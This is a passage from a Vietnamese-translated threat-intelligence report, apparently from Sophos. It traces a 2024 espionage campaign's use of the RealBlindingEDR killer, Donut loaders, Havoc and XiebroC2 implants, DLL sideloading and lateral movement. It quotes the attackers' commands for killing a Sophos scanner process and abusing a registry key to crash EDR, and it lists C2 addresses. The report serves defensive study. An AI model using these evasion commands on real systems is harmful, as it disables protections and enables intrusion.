class=\"wp-element-caption\"><em>H\u00ecnh 4: Ho\u1ea1t \u0111\u1ed9ng \u0111e d\u1ecda li\u00ean t\u1ee5c trong n\u0103m 2024<\/em><\/figcaption><\/figure>\n\n\n\n<p>V\u00e0o th\u00e1ng 1, ch\u00fang t\u00f4i \u0111\u00e3 th\u1ea5y th\u00eam nhi\u1ec1u v\u1ee5 thu th\u1eadp c\u00f3 ch\u1ee7 \u0111\u00edch c\u00e1c t\u00e0i li\u1ec7u c\u1ee7a ng\u01b0\u1eddi d\u00f9ng v\u00e0 c\u01a1 s\u1edf d\u1eef li\u1ec7u truy\u1ec1n th\u00f4ng Viber for Desktop, thu th\u1eadp c\u00e1c cu\u1ed9c tr\u00f2 chuy\u1ec7n n\u1ed9i b\u1ed9 t\u1ea1i t\u1ed5 ch\u1ee9c. Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng c\u0169ng \u0111\u00e3 th\u1ef1c hi\u1ec7n c\u00e1c bi\u1ec7n ph\u00e1p \u0111\u1ec3 v\u00f4 hi\u1ec7u h\u00f3a ph\u1ea7n m\u1ec1m b\u1ea3o v\u1ec7 \u0111i\u1ec3m cu\u1ed1i ho\u1eb7c tr\u1ed1n tr\u00e1nh ph\u00e1t hi\u1ec7n khi kh\u00f4ng th\u1ec3 v\u00f4 hi\u1ec7u h\u00f3a ph\u1ea7n m\u1ec1m.&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 1 n\u0103m 2024: RealBlindingEDR&nbsp;<\/strong><\/p>\n\n\n\n<p>V\u00e0o th\u00e1ng 1 n\u0103m 2024, Sophos MDR \u0111\u00e3 quan s\u00e1t th\u1ea5y c\u00e1c t\u00e1c nh\u00e2n tri\u1ec3n khai hai m\u1eabu&nbsp;<a href=\"https:\/\/github.com\/myzxcg\/RealBlindingEDR\">RealBlindingEDR<\/a>&nbsp;\u0111\u00e3 \u0111\u01b0\u1ee3c s\u1eeda \u0111\u1ed5i \u0111\u00f4i ch\u00fat , m\u1ed9t c\u00f4ng c\u1ee5 ngu\u1ed3n m\u1edf \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf \u0111\u1ec3 &#8220;l\u00e0m m\u00f9&#8221; (ho\u1eb7c gi\u1ebft ch\u1ebft) c\u00e1c gi\u1ea3i ph\u00e1p b\u1ea3o v\u1ec7 ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i v\u00e0 ph\u00e1t hi\u1ec7n v\u00e0 ph\u1ea3n h\u1ed3i \u0111i\u1ec3m cu\u1ed1i (EDR). 
Tr\u1edb tr\u00eau thay, c\u00e1c t\u00e1c nh\u00e2n&nbsp;\u0111\u00e3&nbsp;s\u1eed d\u1ee5ng&nbsp;m\u1ed9t s\u1ea3n ph\u1ea9m b\u1ea3o v\u1ec7 ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i&nbsp;\u0111\u1ec3 th\u1ef1c thi tr\u00ecnh di\u1ec7t EDR nh\u1eb1m t\u1ea1o ra m\u1ed9t chu\u1ed7i th\u1ef1c thi c\u00f3 v\u1ebb &#8220;an to\u00e0n&#8221; \u0111\u1ed1i v\u1edbi c\u00e1c c\u00f4ng c\u1ee5 b\u1ea3o v\u1ec7 ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i kh\u00e1c, t\u01b0\u01a1ng t\u1ef1 nh\u01b0 c\u00e1ch ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i &#8220;tr\u00ecnh di\u1ec7t EDR&#8221; tr\u01b0\u1edbc \u0111\u00e2y \u0111\u00e3&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2023\/04\/19\/aukill-edr-killer-malware-abuses-process-explorer-driver\/\">s\u1eed d\u1ee5ng c\u00e1c th\u00e0nh ph\u1ea7n Windows \u0111\u00e1ng tin c\u1eady<\/a>&nbsp;.&nbsp;&nbsp;<\/p>\n\n\n\n<p>\u0110\u1ec3 minh h\u1ecda c\u00e1ch chu\u1ed7i t\u1ea5n c\u00f4ng tr\u1edf n\u00ean ph\u1ee9c t\u1ea1p h\u01a1n, sau \u0111\u00e2y l\u00e0 c\u00e1ch k\u1ebb t\u1ea5n c\u00f4ng ph\u00e1t h\u00e0nh t\u1ec7p nh\u1ecb ph\u00e2n RealBlindingEDR asoc.exe:.&nbsp;<\/p>\n\n\n\n<p>\u0110\u1ea7u ti\u00ean, k\u1ebb t\u1ea5n c\u00f4ng ch\u1ea1y m\u1ed9t t\u1ec7p l\u1ec7nh h\u00e0ng lo\u1ea1t (33.bat) th\u1ef1c thi l\u1ec7nh sau:&nbsp;&nbsp;<\/p>\n\n\n\n<p>cd c:\\ProgramData &amp;&amp; c:\\ProgramData\\kaba.exe ch\u1ea1y run-cmd &#8220;c:\\ProgramData\\asoc.exe -cccc&#8221;&nbsp;<\/p>\n\n\n\n<p>L\u1ec7nh n\u00e0y s\u1eed d\u1ee5ng kaba.exe, phi\u00ean b\u1ea3n \u0111\u1ed5i t\u00ean c\u1ee7a t\u1ec7p th\u1ef1c thi Kaspersky h\u1ee3p l\u1ec7, \u0111\u1ec3 t\u1ea3i m\u1eabu RealBlindingEDR, asoc.exe.&nbsp;<\/p>\n\n\n\n<p>Sau khi th\u1ef1c thi, \u0111\u1ea7u ti\u00ean asoc.exe s\u1ebd c\u1ed1 g\u1eafng ki\u1ec3m tra xem tr\u00ecnh \u0111i\u1ec1u khi\u1ec3n echo \u0111\u00e3 \u0111\u01b0\u1ee3c t\u1ea3i ch\u01b0a. 
N\u1ebfu ch\u01b0a, n\u00f3 s\u1ebd c\u1ed1 g\u1eafng t\u1ea3i tr\u00ecnh \u0111i\u1ec1u khi\u1ec3n ProgramData\\mico.sys (phi\u00ean b\u1ea3n \u0111\u1ed5i t\u00ean c\u1ee7a echo_driver.sys \u0111\u01b0\u1ee3c tri\u1ec3n khai nh\u01b0 m\u1ed9t ph\u1ea7n c\u1ee7a b\u1ed9 c\u00f4ng c\u1ee5 RealBlindingEDR) v\u00e0 l\u1ea5y x\u1eed l\u00fd c\u1ee7a n\u00f3. C\u00e1c t\u1ec7p nh\u1ecb ph\u00e2n khai th\u00e1c&nbsp;<a href=\"https:\/\/ioctl.fail\/echo-ac-writeup\/\">l\u1ed7 h\u1ed5ng trong c\u00f4ng c\u1ee5 ch\u1ed1ng gian l\u1eadn cho Minecraft c\u00f3 t\u00ean l\u00e0 Echo.ac<\/a>&nbsp;(CVE-2023-38817) v\u00e0 s\u1eed d\u1ee5ng c\u00f4ng c\u1ee5 \u0111\u00f3 \u0111\u1ec3&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2022\/10\/04\/blackbyte-ransomware-returns\/\">x\u00f3a c\u00e1c th\u00f3i quen h\u1ea1t nh\u00e2n<\/a>&nbsp;\u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng b\u1edfi m\u1ed9t s\u1ed1 s\u1ea3n ph\u1ea9m EDR kh\u00e1c nhau, cho ph\u00e9p c\u00e1c t\u00e1c nh\u00e2n leo thang \u0111\u1eb7c quy\u1ec1n c\u1ee7a ch\u00fang th\u00f4ng qua h\u00e0nh vi tr\u1ed9m c\u1eafp m\u00e3 th\u00f4ng b\u00e1o. Echo.ac \u0111\u00e3 \u0111\u01b0\u1ee3c tri\u1ec3n khai trong tr\u01b0\u1eddng h\u1ee3p n\u00e0y v\u00e0 c\u00e1c tr\u01b0\u1eddng h\u1ee3p kh\u00e1c d\u01b0\u1edbi d\u1ea1ng mico.sys. 
Sau \u0111\u00f3, cu\u1ed9c t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng c\u00f9ng m\u1ed9t k\u1ef9 thu\u1eadt \u0111\u1ec3 x\u00f3a c\u00e1c l\u1ec7nh g\u1ecdi l\u1ea1i h\u1ea1t nh\u00e2n CmRegisterCallbacks v\u00e0 MiniFilterCallbacks, c\u1ea3 hai \u0111\u1ec1u l\u00e0 c\u00e1c h\u00e0m h\u1ea1t nh\u00e2n m\u00e0 nhi\u1ec1u s\u1ea3n ph\u1ea9m EDR s\u1eed d\u1ee5ng \u0111\u1ec3 gi\u00e1m s\u00e1t ho\u1ea1t \u0111\u1ed9ng c\u1ee7a h\u1ec7 th\u1ed1ng.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Sau khi RealBlindingEDR x\u00f3a c\u00e1c ch\u01b0\u01a1ng tr\u00ecnh kernel n\u00e0y kh\u1ecfi b\u1ed9 nh\u1edb, n\u00f3 s\u1ebd d\u1ee1 t\u1ea3i tr\u00ecnh \u0111i\u1ec1u khi\u1ec3n Echo.ac (mico.sys) v\u00e0 ch\u1ea1y<\/p>\n\n\n\n<p>taskkill \/IM SophosFileScanner.exe \/F<\/p>\n\n\n\n<p>\u0111\u1ec3 gi\u1ebft ti\u1ebfn tr\u00ecnh SophosFileScanner.exe. \u0110\u1ec3 b\u00e1o hi\u1ec7u thao t\u00e1c th\u00e0nh c\u00f4ng, c\u00e1c t\u1ec7p nh\u1ecb ph\u00e2n s\u1ebd t\u1ea1o m\u1ed9t t\u1ec7p tr\u1ed1ng trong C:\\Users\\Public\\log.ini. 
S\u1ef1 hi\u1ec7n di\u1ec7n c\u1ee7a t\u1ec7p n\u00e0y cho bi\u1ebft th\u00e0nh c\u00f4ng.&nbsp;<\/p>\n\n\n\n<p>M\u1ed9t m\u1eabu RealBlindingEDR kh\u00e1c \u0111\u01b0\u1ee3c ph\u00e1t hi\u1ec7n, ssoc.exe, c\u00f3 m\u1ed9t kh\u1ea3 n\u0103ng b\u1ed5 sung: N\u00f3 s\u1eed d\u1ee5ng m\u1ed9t&nbsp;<a href=\"https:\/\/www.trendmicro.com\/de_de\/research\/23\/e\/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html\">k\u1ef9 thu\u1eadt \u0111\u00e3 bi\u1ebft<\/a>&nbsp;\u0111\u1ec3 c\u1ed1 g\u1eafng l\u00e0m s\u1eadp c\u00e1c quy tr\u00ecnh EDR, b\u1eb1ng c\u00e1ch t\u1ea1o m\u1ed9t kh\u00f3a Registry c\u00f3 t\u00ean l\u00e0 SophosFileScanner.exe trong \u0111\u01b0\u1eddng d\u1eabn SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\, v\u00e0 t\u1ea1o m\u1ed9t gi\u00e1 tr\u1ecb chu\u1ed7i c\u00f3 t\u00ean l\u00e0 MinimumStackCommitInBytes b\u00ean trong kh\u00f3a \u0111\u00f3.&nbsp;<\/p>\n\n\n\n<p>Sophos c\u0169ng quan s\u00e1t th\u1ea5y n\u1ed7 l\u1ef1c c\u1ee7a c\u00e1c t\u00e1c nh\u00e2n nh\u1eb1m s\u1eed d\u1ee5ng m\u1ed9t c\u00f4ng c\u1ee5 m\u00e3 ngu\u1ed3n m\u1edf c\u00f3 t\u00ean l\u00e0&nbsp;<a href=\"https:\/\/github.com\/weak1337\/Alcatraz\">Alcatraz<\/a>&nbsp;, \u0111\u00e2y l\u00e0 m\u1ed9t tr\u00ecnh m\u00e3 h\u00f3a nh\u1ecb ph\u00e2n x64. 
T\u1eeb th\u00e1ng 2 \u0111\u1ebfn th\u00e1ng 5, c\u00f4ng c\u1ee5 n\u00e0y \u0111\u00e3 b\u1ecb ph\u00e1t hi\u1ec7n (d\u01b0\u1edbi d\u1ea1ng ATK\/Alcatraz-D) t\u1ea1i v\u1ecb tr\u00ed C:\\ProgramData\\conhost.exe v\u00e0 b\u1ecb Sophos ng\u0103n kh\u00f4ng cho ch\u1ea1y trong b\u1ed1n l\u1ea7n ri\u00eang bi\u1ec7t.&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 2 n\u0103m 2024: Ki\u1ec3m tra chi\u1ebfn thu\u1eadt v\u00e0 c\u00f4ng c\u1ee5&nbsp;<\/strong><\/p>\n\n\n\n<p>Sau khi Sophos m\u1edf r\u1ed9ng ph\u1ea1m vi ph\u00e1t hi\u1ec7n c\u1ee7a khung Havoc C2, t\u00e1c nh\u00e2n \u0111e d\u1ecda b\u1eaft \u0111\u1ea7u nhanh ch\u00f3ng tu\u1ea7n ho\u00e0n qua m\u1ed9t s\u1ed1 t\u00f9y ch\u1ecdn c\u1ea5y gh\u00e9p C2. Ch\u00fang tri\u1ec3n khai&nbsp;<a href=\"https:\/\/github.com\/INotGreen\/XiebroC2\">khung XieBroC2<\/a>&nbsp;l\u00e0m b\u1ea3n sao l\u01b0u. \u0110\u1ed3ng th\u1eddi, c\u00e1c t\u00e1c nh\u00e2n d\u01b0\u1eddng nh\u01b0 \u0111ang ch\u1ebf t\u1ea1o l\u1ea1i c\u01a1 ch\u1ebf tri\u1ec3n khai c\u1ee7a ch\u00fang.&nbsp;<\/p>\n\n\n\n<p>M\u1ed9t trong nh\u1eefng c\u01a1 ch\u1ebf m\u00e0 h\u1ecd chuy\u1ec3n sang l\u00e0&nbsp;<a href=\"https:\/\/github.com\/TheWover\/donut\">Donut<\/a>&nbsp;, m\u1ed9t c\u00f4ng c\u1ee5 m\u00e3 ngu\u1ed3n m\u1edf t\u1ea1o ra c\u00e1c t\u1eadp l\u1ec7nh ti\u00eam shellcode \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf \u0111\u1ec3 tr\u00e1nh c\u00e1c c\u00f4ng c\u1ee5 b\u1ea3o m\u1eadt. Donut c\u00f3 th\u1ec3 t\u1ea3i m\u1ed9t payload \u0111\u1ed9c h\u1ea1i t\u1eeb b\u1ed9 nh\u1edb v\u00e0 ti\u00eam n\u00f3 v\u00e0o c\u00e1c quy tr\u00ecnh Windows t\u00f9y \u00fd. 
C\u00e1c t\u00e1c nh\u00e2n \u0111e d\u1ecda \u0111\u00e3 \u0111\u01b0\u1ee3c quan s\u00e1t th\u1ea5y nhi\u1ec1u l\u1ea7n s\u1eed d\u1ee5ng tr\u00ecnh t\u1ea3i d\u1ef1a tr\u00ean Donut \u0111\u1ec3 th\u1ea3 c\u00e1c c\u1ea5y gh\u00e9p C2, th\u01b0\u1eddng xuy\u00ean th\u1ea3 c\u00e1c bi\u1ebfn th\u1ec3 c\u1ee7a c\u00e1c c\u1ea5y gh\u00e9p trong v\u00f2ng v\u00e0i gi\u1edd tr\u00ean c\u00e1c m\u00e1y ch\u1ee7 kh\u00e1c nhau.&nbsp;<\/p>\n\n\n\n<p>V\u00e0o ng\u00e0y 1 th\u00e1ng 2, c\u00e1c di\u1ec5n vi\u00ean d\u01b0\u1eddng nh\u01b0 \u0111\u00e3 ti\u1ebfn h\u00e0nh m\u1ed9t h\u00ecnh th\u1ee9c&nbsp;<a href=\"http:\/\/ttps\/en.wikipedia.org\/wiki\/A\/B_testing\">th\u1eed nghi\u1ec7m A\/B<\/a>&nbsp;ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i, tri\u1ec3n khai hai DLL \u0111\u1ed9c h\u1ea1i kh\u00e1c nhau c\u00f3 c\u00f9ng t\u00ean (msntlm.dll) trong v\u00f2ng hai gi\u1edd sau m\u1ed7i l\u1ea7n. C\u1ea3 hai DLL \u0111\u1ec1u li\u00ean h\u1ec7 v\u1edbi c\u00f9ng m\u1ed9t \u0111\u1ecba ch\u1ec9 C2 (&nbsp;141.136.44.219, c\u00f3 v\u1ecb tr\u00ed \u0111\u1ecba l\u00fd t\u1ea1i S\u00edp) t\u1ea1i t\u00ean mi\u1ec1n gsenergyspeedtest.com, tr\u00f9ng kh\u1edbp v\u1edbi m\u1eabu \u0111\u1eb7t t\u00ean mi\u1ec1n \u0111\u01b0\u1ee3c&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/k\/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html\">nh\u00f3m ph\u1ee5 Earth Longzhi<\/a>&nbsp;v\u00e0 Cluster Charlie c\u1ee7a APT 41 s\u1eed d\u1ee5ng trong ho\u1ea1t \u0111\u1ed9ng tr\u01b0\u1edbc \u0111\u00f3.&nbsp;<\/p>\n\n\n\n<p>C\u1ea3 hai DLL ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i \u0111\u1ec1u l\u00e0 tr\u00ecnh t\u1ea3i shellcode Donut. M\u1ed9t trong c\u00e1c m\u1eabu \u0111\u00e3 gi\u1ea3i m\u00e3 v\u00e0 \u0111\u01b0a Havoc Shellcode Dropper v\u00e0o svchost.exe, sau \u0111\u00f3 \u0111\u01b0a m\u1ed9t payload Havoc nh\u00fang v\u00e0o b\u1ed9 nh\u1edb v\u00e0 th\u1ef1c thi payload \u0111\u00f3. 
M\u1eabu c\u00f2n l\u1ea1i \u0111\u00e3 gi\u1ea3i m\u00e3 m\u1ed9t Havoc Shellcode Injector \u0111\u01b0a m\u1ed9t Cobalt Strike Reflective Loader v\u00e0o svchost.exe.&nbsp;&nbsp;<\/p>\n\n\n\n<p>V\u00e0o m\u1ed9t d\u1ecbp kh\u00e1c,&nbsp;27 ng\u00e0y&nbsp;sau l\u1ea7n th\u1eed nghi\u1ec7m A\/B ban \u0111\u1ea7u, ch\u00fang t\u00f4i \u0111\u00e3 quan s\u00e1t th\u1ea5y c\u00e1c t\u00e1c nh\u00e2n t\u1ea3i hai phi\u00ean b\u1ea3n c\u1ee7a m\u1ed9t t\u1ec7p \u0111\u1ed9c h\u1ea1i (libcef.dll) b\u1eb1ng c\u00e1ch l\u1ea1m d\u1ee5ng Java Chromium Embedded Framework Helper h\u1ee3p ph\u00e1p (jcef_helper.exe). M\u1ed9t m\u1eabu libcef.dll \u0111\u00e3 tri\u1ec3n khai XiebroC2 th\u00f4ng qua shellcode t\u1eeb&nbsp;Donut (k\u1ebft n\u1ed1i \u0111\u1ebfn 64.176.50.42:8444, \u0111\u01b0\u1ee3c \u0111\u1ecbnh v\u1ecb \u0111\u1ecba l\u00fd t\u1ea1i Hoa K\u1ef3)&nbsp;, trong khi m\u1eabu c\u00f2n l\u1ea1i tri\u1ec3n khai m\u1ed9t t\u1ea3i tr\u1ecdng Havoc \u0111\u01b0\u1ee3c m\u00e3 h\u00f3a \u0111\u01b0\u1ee3c nh\u00fang trong \u0111\u00f3, khi gi\u1ea3i m\u00e3 s\u1ebd ti\u1ebfp c\u1eadn \u0111\u1ebfn IP c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng l\u00e0 141.136.44.219 \u2014 c\u00f9ng m\u1ed9t \u0111\u1ecba ch\u1ec9 C2 t\u1ea1i S\u00edp \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng trong s\u1ef1 c\u1ed1 ng\u00e0y 1 th\u00e1ng 2.&nbsp;&nbsp;<\/p>\n\n\n\n<p>T\u1ed5ng c\u1ed9ng, trong th\u00e1ng 2 v\u00e0 th\u00e1ng 3 n\u0103m 2024, ch\u00fang t\u00f4i \u0111\u00e3 ch\u1ee9ng ki\u1ebfn \u200b\u200bb\u1ea3y l\u1ea7n tri\u1ec3n khai libcef.dll s\u1eed d\u1ee5ng jcef_helper.exe, trong m\u1ed9t s\u1ed1 tr\u01b0\u1eddng h\u1ee3p \u0111\u01b0\u1ee3c \u0111\u1ed5i t\u00ean th\u00e0nh C:\\PerfLogs\\conhost.exe v\u00e0 trong nh\u1eefng tr\u01b0\u1eddng h\u1ee3p kh\u00e1c kh\u00f4ng \u0111\u1ed5i t\u00ean.&nbsp;&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 2 v\u00e0 th\u00e1ng 3 n\u0103m 2024: Mang theo ng\u01b0\u1eddi tr\u1ee3 gi\u00fap&nbsp;<\/strong><\/p>\n\n\n\n<p>Nhi\u1ec1u l\u1ea7n, nh\u1eefng 
k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 mang theo m\u1ed9t t\u1ec7p th\u1ef1c thi d\u1ec5 b\u1ecb t\u1ea5n c\u00f4ng \u0111\u1ec3 t\u1ea3i c\u00e1c t\u1ec7p DLL \u0111\u1ed9c h\u1ea1i. V\u00e0o th\u00e1ng 2, ch\u00fang \u0111\u00e3 mang theo t\u1ec7p \u0111\u1ed9c h\u1ea1i c:\\perflogs\\wsoc.exe v\u00e0 di chuy\u1ec3n t\u1ec7p n\u00e0y trong m\u00f4i tr\u01b0\u1eddng m\u1ee5c ti\u00eau \u0111\u1ec3 t\u1ea1o c\u00e1c quy tr\u00ecnh ti\u00eam m\u00e3 \u0111\u1ed9c. SophosLabs x\u00e1c \u0111\u1ecbnh wsoc.exe ho\u1ea1t \u0111\u1ed9ng b\u1eb1ng c\u00e1ch t\u1ea1o m\u1ed9t phi\u00ean b\u1ea3n c\u1ee7a Microsoft WMI Provider Subsystem Host \u0111\u1ec3 ch\u1ea1y WmiPrvse \u0111\u1ec3 sau \u0111\u00f3 c\u00f3 th\u1ec3 ti\u00eam m\u00e3 \u0111\u1ed9c v\u00e0o \u0111\u00f3. Trong tr\u01b0\u1eddng h\u1ee3p n\u00e0y, ch\u00fang \u0111\u00e3 ti\u00eam libcef.dll v\u00e0o WMIPrvSe.exe&nbsp;nh\u01b0 m\u1ed9t l\u1edbp che gi\u1ea5u kh\u00e1c. C\u00e1c l\u1ec7nh n\u00e0y d\u01b0\u1eddng nh\u01b0 l\u00e0 m\u1ed9t h\u00ecnh th\u1ee9c th\u1eed nghi\u1ec7m c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng.&nbsp;<\/p>\n\n\n\n<p>V\u00e0o th\u00e1ng 3, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 th\u1ef1c hi\u1ec7n th\u00eam c\u00e1c \u0111i\u1ec1u ch\u1ec9nh \u0111\u1ed1i v\u1edbi c\u00e1c b\u1ea3n c\u1ea5y gh\u00e9p. V\u00e0o \u0111\u1ea7u th\u00e1ng 3, t\u00e1c nh\u00e2n \u0111\u00e3 t\u1eadn d\u1ee5ng jconsole.exe \u0111\u1ec3 t\u1ea3i t\u1ec7p DLL \u0111\u1ed9c h\u1ea1i jli.dll (t\u00ean th\u1ef1c t\u1ebf:&nbsp;<a href=\"https:\/\/github.com\/florylsk\/ExecIT\">ExecIT.dll<\/a>&nbsp;, tr\u00ecnh t\u1ea3i m\u00e3 shell ExecIT). Sau khi t\u00e1c nh\u00e2n t\u1ea3i t\u1ec7p ExecIT, t\u1ec7p s\u1ebd ki\u1ec3m tra s\u1ef1 hi\u1ec7n di\u1ec7n c\u1ee7a t\u1ec7p log.ini trong c\u00f9ng th\u01b0 m\u1ee5c tr\u01b0\u1edbc khi \u0111\u1ecdc t\u1ec7p log.ini v\u00e0 \u0111\u01b0a t\u1ec7p n\u00e0y v\u00e0o b\u1ed9 nh\u1edb c\u1ee7a n\u00f3. 
Theo ph\u00e2n t\u00edch c\u1ee7a Sophos X-Ops, jli.dll c\u0169ng ki\u1ec3m tra c\u00e1c tr\u00ecnh g\u1ee1 l\u1ed7i kh\u00e1c nhau (scylla_x64.exe, ollydbg.exe, idaq64.exe, Zeta Debugger ho\u1eb7c IMMUNITYDEBUGGER.EXE) v\u00e0 c\u00e1c c\u00f4ng c\u1ee5 gi\u00e1m s\u00e1t v\u00e0 ph\u00e2n t\u00edch kh\u00e1c nhau (Unpacked.exe, reshacker.exe v\u00e0 c\u00e1c c\u00f4ng c\u1ee5 kh\u00e1c).&nbsp;<\/p>\n\n\n\n<p>&nbsp;Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 th\u1ea3 DLL \u0111\u01b0\u1ee3c t\u1ea3i b\u00ean ngo\u00e0i th\u00f4ng qua chuy\u1ec3n \u0111\u1ed9ng ngang t\u1eeb m\u1ed9t thi\u1ebft b\u1ecb b\u1ecb x\u00e2m ph\u1ea1m kh\u00e1c v\u00e0 ph\u00e1t hi\u1ec7n ra r\u1eb1ng c\u1ea5y gh\u00e9p t\u1ea1o ra c\u00e1c k\u1ebft n\u1ed1i m\u1ea1ng ra ngo\u00e0i \u0111\u1ebfn 198.13.47.158:443 (\u0111\u01b0\u1ee3c \u0111\u1ecbnh v\u1ecb \u0111\u1ecba l\u00fd t\u1ea1i Nh\u1eadt B\u1ea3n). \u0110\u1ecba ch\u1ec9 IP n\u00e0y \u0111\u00e3 \u0111\u01b0\u1ee3c c\u00e1c t\u00e1c nh\u00e2n \u0111e d\u1ecda Cluster Charlie s\u1eed d\u1ee5ng tr\u01b0\u1edbc \u0111\u00f3 v\u00e0o th\u00e1ng 3 n\u0103m 2023 l\u00e0m C2 cho m\u1eabu c\u1eeda h\u1eadu PocoProxy.&nbsp;&nbsp;<\/p>\n\n\n\n<p>T\u00e1c nh\u00e2n \u0111e d\u1ecda di chuy\u1ec3n theo chi\u1ec1u ngang b\u1eb1ng c\u00e1ch sao ch\u00e9p c\u00e1c t\u1ec7p jconsole.exe, jli.dll v\u00e0 log.ini, sau \u0111\u00f3 t\u1ea1o m\u1ed9t t\u00e1c v\u1ee5 theo l\u1ecbch tr\u00ecnh t\u1eeb xa \u0111\u1ec3 th\u1ef1c thi t\u1ea3i tr\u1ecdng tr\u00ean c\u00e1c m\u00e1y m\u1ee5c ti\u00eau. Jconsole.exe \u0111\u01b0\u1ee3c quan s\u00e1t th\u1ea5y t\u1ea1o ra 131 l\u1ec7nh kh\u00e1m ph\u00e1, di chuy\u1ec3n theo chi\u1ec1u ngang v\u00e0 x\u00f3a ch\u1ec9 b\u00e1o kh\u00e1c nhau. 
Ngay sau \u0111\u00f3, ti\u1ebfn tr\u00ecnh jconsole.exe \u0111\u1ed9c \u200b\u200bh\u1ea1i \u0111\u01b0\u1ee3c th\u1ef1c thi t\u1eeb t\u00e1c v\u1ee5 theo l\u1ecbch tr\u00ecnh t\u1eeb xa v\u00e0 t\u1ea1o k\u1ebft n\u1ed1i IP tr\u1ef1c ti\u1ebfp \u0111\u1ebfn 198.13.47.158:443.&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 chuy\u1ec3n sang tr\u00ecnh t\u1ea3i shellcode Donut m\u1ed9t l\u1ea7n n\u1eefa v\u00e0o ng\u00e0y 11 th\u00e1ng 3, m\u1ed9t l\u1ea7n n\u1eefa l\u1ea1m d\u1ee5ng jcef_helper.exe \u0111\u1ec3 t\u1ea3i m\u1ed9t&nbsp;b\u1ea3n sao Havoc C2 (libcef.dll) c\u00f9ng v\u1edbi t\u1ec7p log.bin. T\u1ec7p log.bin \u0111\u00f3ng vai tr\u00f2 l\u00e0 tr\u00ecnh k\u00edch ho\u1ea1t cho b\u1ea3n sao; shellcode ch\u1ec9 \u0111\u01b0a b\u1ea3n sao v\u00e0o v\u00e0 t\u1ea1o k\u1ebft n\u1ed1i \u0111\u1ebfn C2 c\u1ee7a t\u00e1c nh\u00e2n (IP 45.77.46.245:443, \u0111\u1ecbnh v\u1ecb \u0111\u1ecba l\u00fd t\u1ea1i Singapore) khi log.bin c\u00f3 m\u1eb7t.&nbsp;&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 4 n\u0103m 2024: Tri\u1ec3n khai tin \u0111\u1ed3n&nbsp;<\/strong><\/p>\n\n\n\n<p>V\u00e0o ng\u00e0y 8 v\u00e0 12 th\u00e1ng 4, c\u00e1c t\u00e1c nh\u00e2n \u0111\u00e3 th\u1ef1c hi\u1ec7n ba l\u1ea7n t\u1ea3i ph\u1ee5 kh\u00e1c nhau b\u1eb1ng c\u00e1ch l\u1ea1m d\u1ee5ng th\u00e0nh ph\u1ea7n identity_helper.exe h\u1ee3p l\u1ec7 c\u1ee7a tr\u00ecnh duy\u1ec7t Edge \u0111\u1ec3 t\u1ea3i ph\u1ee5 c\u00e1c DLL \u0111\u1ed9c h\u1ea1i c\u00f3 t\u00ean l\u00e0 msedge_elf.dll. DLL n\u00e0y l\u00e0 tr\u00ecnh t\u1ea3i Donut mang t\u1ea3i tr\u1ecdng Havoc C2 d\u01b0\u1edbi d\u1ea1ng t\u1ec7p nh\u1ecb ph\u00e2n, t\u1ec7p n\u00e0y s\u1ebd \u0111\u01b0\u1ee3c \u0111\u01b0a v\u00e0o b\u1ed9 nh\u1edb khi gi\u1ea3i m\u00e3. 
Trong hai tr\u01b0\u1eddng h\u1ee3p, t\u1ea3i tr\u1ecdng Havoc \u0111i k\u00e8m \u0111\u00e3 \u0111\u01b0\u1ee3c m\u00e3 h\u00f3a \u0111\u00e3 \u0111\u01b0\u1ee3c g\u1eedi v\u00e0o C:\\Windows\\temp\\temp.log v\u00e0 \u0111\u01b0\u1ee3c k\u1ebft n\u1ed1i v\u1edbi m\u00e1y ch\u1ee7 C2 t\u1ea1i 64.176.37.107:443 (\u0111\u01b0\u1ee3c \u0111\u1ecbnh v\u1ecb \u0111\u1ecba l\u00fd t\u1ea1i Canada); trong m\u1ed9t tr\u01b0\u1eddng h\u1ee3p kh\u00e1c, n\u00f3 \u0111\u00e3 \u0111\u01b0\u1ee3c th\u1ea3 v\u00e0o c\u00f9ng m\u1ed9t v\u1ecb tr\u00ed v\u1edbi DLL c\u00f3 t\u00ean log.ini v\u00e0 \u0111\u01b0\u1ee3c k\u1ebft n\u1ed1i \u0111\u1ebfn 45.77.46.245:443 (\u0111\u01b0\u1ee3c \u0111\u1ecbnh v\u1ecb \u0111\u1ecba l\u00fd t\u1ea1i Hoa K\u1ef3).&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>V\u00e0o ng\u00e0y 10 th\u00e1ng 4, c\u00e1c t\u00e1c nh\u00e2n \u0111\u00e3 s\u1eed d\u1ee5ng m\u1ed9t jconsole.exe \u0111\u01b0\u1ee3c \u0111\u1ed5i t\u00ean kh\u00e1c, l\u1ea7n n\u00e0y \u0111\u1ed5i t\u00ean th\u00e0nh firefox.exe, trong m\u1ed9t n\u1ed7 l\u1ef1c t\u01b0\u01a1ng 